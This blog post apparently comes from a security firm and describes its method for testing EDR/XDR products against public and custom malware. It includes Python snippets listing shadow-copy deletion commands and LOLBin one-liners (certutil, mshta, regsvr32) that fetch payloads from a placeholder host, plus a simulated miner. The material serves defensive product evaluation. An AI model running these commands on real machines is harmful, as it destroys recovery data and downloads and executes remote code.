Assessing Endpoint Protection: Our Approach to Evaluating EDR/XDR and Supplementary Solutions

There is a growing landscape of security products promising to protect an organization’s IT infrastructure from attacks. Solutions referred to as EDR (Endpoint Detection and Response), and sometimes also as XDR (Extended Detection and Response), are designed to detect and stop malicious activity on endpoints. The ever-increasing number of breaches and their associated costs, especially in the realm of ransomware attacks, raise the question of whether more can be done to add a further layer to traditional endpoint protection concepts. That is why a customer of ours commissioned us to evaluate whether solutions that supplement an EDR provide extended protection against ever-evolving threats, and to shine a light on the performance overhead those solutions might introduce.

This blog post describes the methodology we use to evaluate and compare different EDR solutions for our customers. Given the growing number of sophisticated attacks, it is important not only to look at detection rates in isolation but to assess how these solutions perform under realistic conditions.

To achieve this, we combine tests with publicly known malware and custom-developed samples, simulate real-world attack scenarios, and analyze how each solution responds at different stages of an attack. In addition, we measure the performance impact on typical user activities to understand the trade-offs between security and usability.

The goal of this approach is to provide a structured, transparent, and practical basis for comparing EDR solutions and their supplements to support informed decisions in real-world deployments.

Test Setup

To test the security products and their combination, the test setup comprises multiple virtual machines. Each virtual machine has an identical base configuration, but individual protection solutions are installed on each. Additionally, snapshots of the virtual machines are created to enable rollbacks to a clean, uniform starting point. This is especially important since malware will be placed on the systems. The configurations of the EDR solutions are performed in accordance with customer-specific guidelines and settings.

To create a realistic test environment, a collection of clean test files is placed in the user directories to simulate a normal workstation. Those test files comprise more than 100 files of various types and sizes, totaling over a gigabyte of data. Moreover, a normal usage history is created to thwart potential anti-forensic measures that may be implemented within the malware. The created usage history includes placing files in the Windows trash bin, creating browser history, downloading files, and saving browser credentials. Saved browser credentials are a popular target for malware, and an EDR protection solution might monitor malicious access to this sensitive data.

Methodology

To achieve the best possible coverage against a wide, realistic range of threats, the efficacy of the different EDR solutions and their combination was tested against both publicly known malware samples and custom-made malicious software.

Methodology for Publicly Known Malware

As the name publicly known malware suggests, the samples in this part of the test should be detected by every EDR protection solution. However, this needs to be verified. The goal is to check whether quantitative differences exist between the tested EDR solutions. To handle the large number of malware samples within the limited time frame, both the testing procedure and result analysis are automated as much as possible.

There are various collections of publicly known malware. Such collections consist of samples in different file formats and sizes, and often several thousand new samples are added each month. Since most malware collections also include samples targeting other platforms, such as Linux ELF files or bash scripts that will not run on Windows systems, these files are removed from the dataset. From the remaining files, a subset is selected for the tests.

To test the detection of publicly known malware samples, a script downloads each sample via HTTPS from one of our web servers to the test machine and saves it in a folder on the user’s desktop. When the file type of a sample cannot be automatically detected, the file is saved in multiple copies with different file extensions (e.g., bat, ps1, vbs). To verify whether the installed EDR protection solutions removed the malicious sample after download, the automation script first attempts to access the sample via a file read. If the file is still present, the automation script simulates a user double-clicking the file in Windows Explorer in the next step (e.g., .exe files are executed, .pdf files are opened in the default PDF viewer, etc.).
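As a rough sketch, the download-and-open loop might look like the following. Server URL, folder layout, and helper names are illustrative assumptions, not our actual framework:

```python
import os
import urllib.request

# Fallback extensions used when a sample's file type cannot be detected
# automatically (illustrative subset).
FALLBACK_EXTENSIONS = ["bat", "ps1", "vbs"]

def candidate_names(sample_name, detected_ext=None):
    """Return the file name(s) a sample is saved under.

    If the file type was detected, one name with that extension is used;
    otherwise one copy per fallback extension is created."""
    if detected_ext:
        return [f"{sample_name}.{detected_ext}"]
    return [f"{sample_name}.{ext}" for ext in FALLBACK_EXTENSIONS]

def sample_still_present(path):
    """First check: try to read the file to see whether the EDR removed it."""
    try:
        with open(path, "rb") as f:
            f.read(1)
        return True
    except OSError:
        return False

def run_test(sample_url, dest_dir, sample_name, detected_ext=None):
    results = {}
    for name in candidate_names(sample_name, detected_ext):
        path = os.path.join(dest_dir, name)
        urllib.request.urlretrieve(sample_url, path)  # download via HTTPS
        if not sample_still_present(path):
            results[name] = "removed on download"
            continue
        # Simulate the double-click: os.startfile uses the Windows
        # file-type association, just like Explorer (Windows only).
        os.startfile(path)
        results[name] = "executed/opened"
    return results
```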

The results of those tests are logged together with relevant information collected from the Windows event logs.

Methodology for Custom Malware

The detection of custom-made malware samples is a difficult task for EDR solutions and, therefore, is most important for comparing their performance. For this reason, we create custom malware samples for these tests. Naturally, the custom-built malware samples are far fewer than the large collections of publicly known malware. Therefore, neither the execution nor the evaluation needs to rely on automation to test the collection of custom samples. Every sample is executed by an analyst via an RDP session on the test machines, and the results are manually recorded.

The standard procedure here looks like this:

  • The test system is booted from a clean snapshot. This way, we can guarantee that no test is ‘contaminated’ by residue from previous tests.
  • The sample is loaded onto the system. While this can be done in multiple ways, the two most practical variants are downloading via a web browser or a command-line tool like curl. The difference here might matter for the detection process, depending on how a defensive system is designed:
    • A defensive system might insert a hook into the browser’s download process and automatically trigger a scan of all downloads, similar to Defender’s SmartScreen.
    • Currently, curl does not create Zone.Identifier alternate data streams (ADS) for downloaded files. These markers, also known as the Mark of the Web, make files downloaded from the internet easily recognizable, and their absence might influence how a defense system handles such files.
  • In the next step, the sample is executed. This can happen in a variety of ways: by a simple double-click, by a right-click and Run as administrator, from a cmd.exe or PowerShell session, and more. And again, the difference might matter, since a security system could include the privileges and parent process of a process in its verdict.
  • There is a possibility that user interaction is required during execution. The most common variant is the Windows Security message “This content is blocked”, which is commonly created by the attack surface reduction (ASR) rule “Block executable files from running unless they meet a prevalence, age, or trusted list criteria”. How to handle these prompts should be decided in advance. We usually follow the rule: “If there is any direct, user-accessible button with Allow, Unblock, or Proceed, we will click it.”
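The Zone.Identifier stream mentioned above is a small text stream attached to downloaded files. A minimal sketch of its format and of attaching it manually (the helper names are our own; writing to `path:Zone.Identifier` requires NTFS/Windows):

```python
ZONE_INTERNET = 3  # URLZONE_INTERNET

def motw_content(zone_id=ZONE_INTERNET, referrer_url=None, host_url=None):
    """Build the content of a Zone.Identifier alternate data stream."""
    lines = ["[ZoneTransfer]", f"ZoneId={zone_id}"]
    if referrer_url:
        lines.append(f"ReferrerUrl={referrer_url}")
    if host_url:
        lines.append(f"HostUrl={host_url}")
    return "\r\n".join(lines) + "\r\n"

def add_motw(path, content):
    """Attach the Mark of the Web to a downloaded file (NTFS only)."""
    with open(path + ":Zone.Identifier", "w", newline="") as stream:
        stream.write(content)
```

This also allows a harness to add the marker to curl-downloaded files on purpose, so both variants (with and without the Mark of the Web) can be tested.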

Some tests are designed in multiple stages. For example, some samples communicate with a command-and-control (C2) server to receive commands. Such samples are designed so that commands start harmlessly and escalate over time. During the initial start of the malware, the C2 server does not send any commands. In a second step, the C2 server sends the malware a harmless command (e.g., printing a string to the console or displaying a message box), which is executed on the target system. In the third stage, the C2 server instructs the malware to download and execute an additional file, and so forth. Each step is designed to be more aggressive, more openly malicious, and easier to detect than the previous step. After each step, it can be checked if a specific command triggered any alerts or was blocked.
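The staged escalation can be illustrated with a small stand-in for the server-side logic. Stage names and commands here are purely illustrative:

```python
# Each poll from the implant advances one stage; after each stage the
# analyst checks whether the EDR raised an alert or blocked the action.
STAGES = [
    "noop",                     # stage 0: server sends no real command
    "print:hello from c2",      # stage 1: harmless console output
    "msgbox:stage two",         # stage 2: visible but benign
    "fetch_and_exec:payload2",  # stage 3: download & execute a second file
]

class StagedC2:
    """Server-side stand-in that hands out one command per poll,
    escalating through the stages, then goes silent."""

    def __init__(self, stages=STAGES):
        self.stages = stages
        self.next_stage = 0

    def poll(self):
        if self.next_stage >= len(self.stages):
            return None
        cmd = self.stages[self.next_stage]
        self.next_stage += 1
        return cmd
```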

All these practices come together to form a methodology designed to mimic real-world conditions (both in operations and the threat landscape) as closely as possible, ensuring that the results are representative of practical operations. The goal is to enable valid predictions of real-world performance by systematically evaluating the systems under conditions representative of real-world threat behavior.

Custom Malware Samples

As described above, several custom, previously unknown malware samples are created to test the EDR solutions’ ability to detect previously unseen malicious samples. Since those samples are specifically created for a single assessment, a simple signature check will not catch them, and more advanced methods are required to detect and stop the custom malware samples. For all custom malware, we use a mix of compiled and interpreted programming languages. The following different malware types are created:

Backdoors: During preparation, several custom backdoor designs are created. For the purposes of this text, a backdoor is any kind of software designed to give attackers hidden, persistent access to a system. The backdoors incorporate several different features and C2 channels and are written in different programming languages.

Ransomware: Nowadays, ransomware is one of the most common types of malware. It encrypts local files, making them unusable for the user. To decrypt the files, a ransom needs to be paid to obtain the decryption key from the attackers. A selection of custom ransomware samples is created that use a variety of designs and algorithms to cover the entire spectrum of potential new ransomware variants.

Infostealer: Infostealers are a type of malware designed specifically to secretly collect sensitive information from a device and send it to the attackers. This might be a goal on its own (e.g., stealing credentials) or part of a larger attack (e.g., a ransomware attack in which files are exfiltrated before encryption, adding another layer to the extortion). To simulate both cases, two custom malware samples are created. The first sample extracts the credentials from the web browser and uploads them to the attackers. The second sample tries to upload as many user files as possible from the system to the attackers.

Malicious Documents: Access to a computer is often gained through an email with a malicious attached document. Once the user opens the attachment, the system is infected. However, opening the document often prompts the user to accept warnings first. Multiple documents are created to simulate such an attack and observe the EDR’s behavior on unseen samples of this malware type.

Malicious Actions and Behavior

Not everything malicious is a file. For this reason, we also test for various malicious actions and behavior patterns commonly observed in attacks.

Shadow Copy Deletion: In modern Windows versions, the Volume Shadow Copy Service (VSS) automatically creates backup snapshots (shadow copies) of files and the system state. Such shadow copies allow restoring previous versions of files or system rollbacks after a failed upgrade attempt. As such, they are almost the natural enemy of ransomware: after a ransomware attack, these copies are often the fastest way to recover encrypted files without paying ransom, provided they still exist. Naturally, shadow copy deletion is a common step in ransomware attacks to prevent victims from restoring their files on their own. We therefore test various ways to delete (or otherwise disable) shadow copies and check whether the evaluated security solution can detect and prevent such behavior.
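As an illustration, a test harness might iterate over deletion variants like the following. All four are documented Windows commands; the exact variant list used in an assessment is customer- and scenario-specific:

```python
import subprocess
import sys

# Shadow copy deletion variants to exercise; the defender's reaction
# (blocked, alerted, or allowed) is recorded per command.
SHADOW_COPY_DELETION_VARIANTS = [
    ["vssadmin.exe", "delete", "shadows", "/all", "/quiet"],
    ["wmic.exe", "shadowcopy", "delete"],
    ["powershell.exe", "-Command",
     "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"],
    # Shrinking shadow storage forces Windows to discard old copies, too.
    ["vssadmin.exe", "resize", "shadowstorage",
     "/for=C:", "/on=C:", "/maxsize=401MB"],
]

def run_variants():
    """Run each variant (Windows only) and record the exit status."""
    if sys.platform != "win32":
        raise RuntimeError("shadow copy tests only apply to Windows")
    outcomes = {}
    for cmd in SHADOW_COPY_DELETION_VARIANTS:
        proc = subprocess.run(cmd, capture_output=True)
        outcomes[cmd[0]] = proc.returncode  # non-zero often means "blocked"
    return outcomes
```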

Event Log Clearing: Attackers often clear Windows event logs as part of their post-compromise activity to cover their traces. Event logs in Windows are a critical source of forensic information, and erasing or tampering with them helps attackers complicate detection. We therefore also check if deleting the event logs is prevented or triggers any alerts.

Malicious PowerShell Scripts: PowerShell scripts are a useful tool for both admins and attackers alike. We therefore test how well the defensive system reacts when malicious PowerShell scripts are loaded, whether from a file, a URL, or pasted into the console.

Unusual Resource Consumption: Cryptominer malware (a.k.a. cryptojackers) is designed to secretly use a victim’s CPU or GPU to mine cryptocurrency (e.g., Bitcoin or Monero). While implementations vary, some traits are hard to avoid: a cryptominer needs to connect to a server to fetch the task to compute, compute it (often utilizing all available resources), and send the results back (if successful). For our test, we use a simulated cryptominer: it loads a value from the web server and executes 1,000,000 SHA-256 operations with it, using the output of the last hashing operation as input to the next. This is done in as many parallel processes as there are CPU cores available. The rationale here is to check whether the solution, in any way, flags an application with this behavior.
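A minimal sketch of such a simulated miner (the task URL is a placeholder for our web server; the per-core seed variation is an illustrative detail):

```python
import hashlib
import multiprocessing
import urllib.request

ITERATIONS = 1_000_000

def chained_sha256(seed, iterations=ITERATIONS):
    """Hash the seed repeatedly, feeding each digest into the next round."""
    value = seed
    for _ in range(iterations):
        value = hashlib.sha256(value).digest()
    return value.hex()

def mine(task_url):
    """Fetch a seed value and hash it in one worker per CPU core."""
    seed = urllib.request.urlopen(task_url).read()
    cores = multiprocessing.cpu_count()
    # Give each worker a per-core variant of the seed so all cores stay busy.
    seeds = [seed + str(i).encode() for i in range(cores)]
    with multiprocessing.Pool(cores) as pool:
        return pool.map(chained_sha256, seeds)
```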

LOLBins: LOLBins (Living-Off-the-Land Binaries) are legitimate executables already present on a system that attackers abuse to perform malicious actions without dropping new files. The concept stems from the broader technique of Living off the Land, in which attackers rely on built-in tools to blend in with normal system activity. For this reason, we test the abuse of different LOLBins and check whether any protection system intervenes.
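A few representative, widely documented abuse patterns we exercise (see the LOLBAS project for the full catalogue; URLs and file names below are placeholders):

```python
# Mapping of LOLBin name to an example invocation; each one is run on the
# test system and the security solution's reaction is recorded.
LOLBIN_TESTS = {
    # certutil doubles as a file downloader
    "certutil": "certutil.exe -urlcache -split -f https://example.test/payload out.bin",
    # mshta executes remote HTML applications
    "mshta": "mshta.exe https://example.test/payload.hta",
    # regsvr32 can fetch and run a scriptlet ("Squiblydoo")
    "regsvr32": "regsvr32.exe /s /n /u /i:https://example.test/payload.sct scrobj.dll",
    # rundll32 executes arbitrary exported functions from a DLL
    "rundll32": "rundll32.exe payload.dll,EntryPoint",
}
```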

Performance Testing

In addition to tests with public and custom malware samples, the protection solutions are also evaluated regarding their performance impact on everyday workloads. For this purpose, the time required to open test files of various types, launch applications, and copy data is measured. Each workload is tested multiple times, according to a predetermined sample size, with a cooldown period between runs.

The resulting measurement data set is cleaned of outliers to prevent distortions. After that, the arithmetic mean is calculated for each workload and for all measurements with the respective protection solution applied. The latter is compared to a baseline system with no active EDR to determine the average overhead of each protection solution.
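This evaluation step can be sketched as follows, assuming an IQR-based outlier rule (the concrete rule used in an assessment may differ):

```python
import statistics

def drop_outliers(samples):
    """Drop values more than 1.5 IQRs outside the quartiles."""
    q1, _, q3 = statistics.quantiles(samples, n=4)
    iqr = q3 - q1
    lo, hi = q1 - 1.5 * iqr, q3 + 1.5 * iqr
    return [s for s in samples if lo <= s <= hi]

def overhead_percent(measured, baseline):
    """Average overhead of a protection solution vs. the EDR-free baseline."""
    m = statistics.mean(drop_outliers(measured))
    b = statistics.mean(drop_outliers(baseline))
    return (m - b) / b * 100
```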

Evaluation

While custom malware samples are evaluated manually, the significantly larger set of publicly known samples requires an automated approach.

For this purpose, data from multiple sources is correlated: endpoint logs, cloud-based telemetry provided by the respective solutions, and logs generated by the automation framework during testing. By combining these sources, it is possible to systematically identify events related to each tested sample.

This approach allows us to determine whether a sample was detected, at which stage (e.g., during download, on access, or upon execution), and which component of the EDR solution was responsible for the detection.

Conclusion

EDR and XDR solutions are key components of modern security architectures, providing valuable capabilities for detecting and mitigating attacks. However, their deployment alone does not guarantee improved security. Effectiveness depends on factors such as configuration, integration, and the organization’s specific threat model.

The same product can yield very different results depending on its implementation and the defender’s objectives. This makes practical evaluation essential and often yields surprising results!

Only through such testing can organizations determine whether a product meaningfully strengthens their defenses or provides only limited value in real-world scenarios. For those of you looking to validate your current setup, explore new tools, or meet compliance requirements such as #DORA, feel free to reach out to us for a thorough EDR assessment: https://ernw-research.de/en/contact.html.

Cheers!

Justus, Nils, Lucas & Gregor
